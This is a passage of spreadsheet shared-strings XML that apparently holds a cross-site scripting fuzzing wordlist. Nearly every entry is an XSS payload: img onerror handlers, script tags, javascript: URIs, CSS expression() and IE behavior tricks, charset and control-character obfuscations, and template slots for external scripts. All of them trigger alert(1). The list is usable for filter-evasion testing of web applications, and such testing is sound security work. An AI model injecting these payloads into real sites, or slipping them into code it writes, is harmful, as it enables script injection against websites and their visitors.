    <t>&lt;a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x3Bjavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\x0Djavascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x09javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x00javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x0Cjavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\x2Bjavascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;-javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x0Ajavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x7Ejavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xC2\x85javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x21javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\x0Bjavascript:alert(1)&lt;/script&gt;`'&gt;&lt;script&gt;\x20javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(1)&lt;/script&gt;/&gt;&lt;img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /&gt;</t>
  </si>
  <si>
    <t>/&gt;&lt;img/onerror=\x22javascript:alert(1)\x22src=xxx:x /&gt;/&gt;&lt;img/onerror=\x09javascript:alert(1)\x09src=xxx:x /&gt;</t>
  </si>
  <si>
    <t>/&gt;&lt;img/onerror=\x27javascript:alert(1)\x27src=xxx:x /&gt;/&gt;&lt;img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /&gt;</t>
  </si>
  <si>
    <t>/&gt;&lt;img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /&gt;/&gt;&lt;img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /&gt;</t>
  </si>
  <si>
    <t>/&gt;&lt;img/onerror=\x60javascript:alert(1)\x60src=xxx:x /&gt;/&gt;&lt;img/onerror=\x20javascript:alert(1)\x20src=xxx:x /&gt;</t>
  </si>
  <si>
    <t>&lt;script\x2F&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x20&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x0D&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x0A&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x0C&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x00&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x09&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x onerror\x0B=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x onerror\x00=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x onerror\x0C=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x onerror\x0D=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x onerror\x20=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x onerror\x0A=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src=xxx:x onerror\x09=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;javascript:alert(1)&lt;\x00/script&gt;</t>
  </si>
  <si>
    <t>&lt;img src=# onerror\x3D"javascript:alert(1)" &gt;</t>
  </si>
  <si>
    <t>&lt;input onfocus=javascript:alert(1) autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;input onblur=javascript:alert(1) autofocus&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;video poster=javascript:javascript:alert(1)//</t>
  </si>
  <si>
    <t>&lt;body onscroll=javascript:alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;form id=test onforminput=javascript:alert(1)&gt;&lt;input&gt;&lt;/form&gt;&lt;button form=test onformchange=javascript:alert(1)&gt;X</t>
  </si>
  <si>
    <t>&lt;video&gt;&lt;source onerror="javascript:javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;video onerror="javascript:javascript:alert(1)"&gt;&lt;source&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;button formaction="javascript:javascript:alert(1)"&gt;X</t>
  </si>
  <si>
    <t>&lt;body oninput=javascript:alert(1)&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;math href="javascript:javascript:alert(1)"&gt;CLICKME&lt;/math&gt;  &lt;math&gt; &lt;maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)"&gt;CLICKME&lt;/maction&gt; &lt;/math&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onload=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;table background="javascript:javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=javascript:alert(1)//"&gt;</t>
  </si>
  <si>
    <t>&lt;comment&gt;&lt;img src="&lt;/comment&gt;&lt;img src=x onerror=javascript:alert(1))//"&gt;</t>
  </si>
  <si>
    <t>&lt;![&gt;&lt;img src="]&gt;&lt;img src=x onerror=javascript:alert(1)//"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=javascript:alert(1)//"&gt;</t>
  </si>
  <si>
    <t>&lt;li style=list-style:url() onerror=javascript:alert(1)&gt; &lt;div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;head&gt;&lt;base href="javascript://"&gt;&lt;/head&gt;&lt;body&gt;&lt;a href="/. /,javascript:alert(1)//#"&gt;XXX&lt;/a&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT FOR=document EVENT=onreadystatechange&gt;javascript:alert(1)&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"&gt;&lt;PARAM NAME="DataURL" VALUE="javascript:alert(1)"&gt;&lt;/OBJECT&gt;</t>
  </si>
  <si>
    <t>&lt;object data="data:text/html;base64,%(base64)s"&gt;</t>
  </si>
  <si>
    <t>&lt;embed src="data:text/html;base64,%(base64)s"&gt;</t>
  </si>
  <si>
    <t>&lt;b &lt;script&gt;alert(1)&lt;/script&gt;0</t>
  </si>
  <si>
    <t>&lt;div id="div1"&gt;&lt;input value="``onmouseover=javascript:alert(1)"&gt;&lt;/div&gt; &lt;div id="div2"&gt;&lt;/div&gt;&lt;script&gt;document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;x '="foo"&gt;&lt;x foo='&gt;&lt;img src=x onerror=javascript:alert(1)//'&gt;</t>
  </si>
  <si>
    <t>&lt;embed src="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;image src="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;script src="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;div style=width:1px;filter:glow onfilterchange=javascript:alert(1)&gt;x</t>
  </si>
  <si>
    <t>&lt;? foo="&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;! foo="&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;/ foo="&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;? foo="&gt;&lt;x foo='?&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;'&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;! foo="[[[Inception]]"&gt;&lt;x foo="]foo&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;% foo&gt;&lt;x foo="%&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;div id=d&gt;&lt;x xmlns="&gt;&lt;iframe onload=javascript:alert(1)"&gt;&lt;/div&gt; &lt;script&gt;d.innerHTML=d.innerHTML&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;img \x00src=x onerror="alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img \x47src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img \x11src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img \x12src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img\x47src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img\x10src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img\x13src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img\x32src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img\x11src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img \x34src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img \x39src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img \x00src=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x09=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x10=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x13=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x32=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x12=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x11=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x00=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src\x47=x onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x\x09onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x\x10onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x\x11onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x\x12onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x\x13onerror="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=\x09"javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=\x10"javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=\x11"javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=\x12"javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=\x32"javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=\x00"javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(1)&gt;XXX&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;img src="x` `&lt;script&gt;javascript:alert(1)&lt;/script&gt;"` `&gt;</t>
  </si>
  <si>
    <t>&lt;img src onerror /" '"= alt=javascript:alert(1)//"&gt;</t>
  </si>
  <si>
    <t>&lt;title onpropertychange=javascript:alert(1)&gt;&lt;/title&gt;&lt;title title=&gt;</t>
  </si>
  <si>
    <t>&lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(1)&gt;&lt;/a&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;!--[if]&gt;&lt;script&gt;javascript:alert(1)&lt;/script --&gt;</t>
  </si>
  <si>
    <t>&lt;!--[if&lt;img src=x onerror=javascript:alert(1)//]&gt; --&gt;</t>
  </si>
  <si>
    <t>&lt;script src="/\%(jscript)s"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script src="\\%(jscript)s"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"&gt;&lt;/object&gt; &lt;object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"&gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current"&gt;X</t>
  </si>
  <si>
    <t>&lt;style&gt;p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d</t>
  </si>
  <si>
    <t>&lt;style&gt;@import "data:,*%7bx:expression(javascript:alert(1))%7D";&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;a style="pointer-events:none;position:absolute;"&gt;&lt;a style="position:absolute;" onclick="javascript:alert(1);"&gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a href="javascript:javascript:alert(1)"&gt;XXX&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;*[{}@import'%(css)s?]&lt;/style&gt;X</t>
  </si>
  <si>
    <t>&lt;div style="font-family:'foo&amp;#10;;color:red;';"&gt;XXX</t>
  </si>
  <si>
    <t>&lt;div style="font-family:foo}color=red;"&gt;XXX</t>
  </si>
  <si>
    <t>&lt;// style=x:expression\28javascript:alert(1)\29&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;div style=content:url(%(svg)s)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));"&gt;X</t>
  </si>
  <si>
    <t>&lt;div id=d&gt;&lt;div style="font-family:'sans\27\3B color\3Ared\3B'"&gt;X&lt;/div&gt;&lt;/div&gt; &lt;script&gt;with(document.getElementById("d"))innerHTML=innerHTML&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div style="background:url(/f#&amp;#127;oo/;color:red/*/foo.jpg);"&gt;X</t>
  </si>
  <si>
    <t>&lt;div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);"&gt;X</t>
  </si>
  <si>
    <t>&lt;div id="x"&gt;XXX&lt;/div&gt; &lt;style&gt;  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  &lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;x style="background:url('x&amp;#1;;color:red;/*')"&gt;XXX&lt;/x&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;({0:#0=eval/#0#/#0#(javascript:alert(1))})&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;meta charset="x-imap4-modified-utf7"&gt;&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi</t>
  </si>
  <si>
    <t>&lt;meta charset="x-imap4-modified-utf7"&gt;&amp;&lt;script&amp;S1&amp;TS&amp;1&gt;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;</t>
  </si>
  <si>
    <t>&lt;meta charset="mac-farsi"&gt;¼script¾javascript:alert(1)¼/script¾</t>
  </si>
  <si>
    <t>X&lt;x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` &gt;</t>
  </si>
  <si>
    <t>1&lt;set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&amp;#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&amp;lt;img/src=&amp;quot;x&amp;quot;onerror=javascript:alert(1)&amp;gt;`&gt;</t>
  </si>
  <si>
    <t>1&lt;animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&amp;lt;img/src=&amp;quot;.&amp;quot;onerror=javascript:alert(1)&amp;gt;&gt;</t>
  </si>
  <si>
    <t>&lt;vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss&gt;&lt;/vmlframe&gt;</t>
  </si>
  <si>
    <t>1&lt;a href=#&gt;&lt;line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)"&gt;XXX&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;x style="behavior:url(%(sct)s)"&gt;</t>
  </si>
  <si>
    <t>&lt;xml id="xss" src="%(htc)s"&gt;&lt;/xml&gt; &lt;label dataformatas="html" datasrc="#xss" datafld="payload"&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;event-source src="%(event)s" onload="javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javascript:javascript:alert(1)"&gt;&lt;event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"&gt;</t>
  </si>
  <si>
    <t>&lt;div id="x"&gt;x&lt;/div&gt; &lt;xml:namespace prefix="t"&gt; &lt;import namespace="t" implementation="#default#time2"&gt; &lt;t:set attributeName="innerHTML" targetElement="x" to="&amp;lt;img&amp;#11;src=x:x&amp;#11;onerror&amp;#11;=javascript:alert(1)&amp;gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;%(payload)s&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script src=%(jscript)s&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script language='javascript' src='%(jscript)s'&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="javascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=`javascript:javascript:alert(1)`&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC=%(jscript)s?&lt;B&gt;</t>
  </si>
  <si>
    <t>&lt;FRAMESET&gt;&lt;FRAME SRC="javascript:javascript:alert(1);"&gt;&lt;/FRAMESET&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=javascript:javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav    ascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;BODY onload!#$%%&amp;()*~+-_.,:;?@[/|\]^`=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT/SRC="%(jscript)s"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;&lt;SCRIPT&gt;%(payload)s//&lt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="javascript:javascript:alert(1)"</t>
  </si>
  <si>
    <t>&lt;iframe src=%(scriptlet)s &lt;</t>
  </si>
  <si>
    <t>&lt;INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG DYNSRC="javascript:javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG LOWSRC="javascript:javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;BGSOUND SRC="javascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;BR SIZE="&amp;{javascript:alert(1)}"&gt;</t>
  </si>
  <si>
    <t>&lt;LAYER SRC="%(scriptlet)s"&gt;&lt;/LAYER&gt;</t>
  </si>
  <si>
    <t>&lt;LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;@import'%(css)s';&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="Link" Content="&lt;%(css)s&gt;; REL=stylesheet"&gt;</t>
  </si>
  <si>
    <t>&lt;XSS STYLE="behavior: url(%(htc)s);"&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;li {list-style-image: url("javascript:javascript:alert(1)");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;IFRAME SRC="javascript:javascript:alert(1);"&gt;&lt;/IFRAME&gt;</t>
  </si>
  <si>
    <t>&lt;TABLE BACKGROUND="javascript:javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;TABLE&gt;&lt;TD BACKGROUND="javascript:javascript:alert(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;DIV STYLE="background-image: url(javascript:javascript:alert(1))"&gt;</t>
  </si>
  <si>
    <t>&lt;DIV STYLE="width:expression(javascript:alert(1));"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"&gt;</t>
  </si>
  <si>
    <t>&lt;XSS STYLE="xss:expression(javascript:alert(1))"&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE TYPE="text/javascript"&gt;javascript:alert(1);&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;.XSS{background-image:url("javascript:javascript:alert(1)");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:javascript:alert(1)")}&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;javascript:alert(1);&lt;/SCRIPT&gt;&lt;![endif]--&gt;</t>
  </si>
  <si>
    <t>&lt;BASE HREF="javascript:javascript:alert(1);//"&gt;</t>
  </si>
  <si>
    <t>&lt;OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"&gt;&lt;/OBJECT&gt;</t>
  </si>
  <si>
    <t>&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:javascript:alert(1)&gt;&lt;/OBJECT&gt;</t>
  </si>
  <si>
    <t>&lt;HTML xmlns:xss&gt;&lt;?import namespace="xss" implementation="%(htc)s"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;""","XML namespace."),("""&lt;XML ID="xss"&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC="javas&lt;!-- --&gt;cript:javascript:alert(1)"&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;</t>
  </si>
  <si>
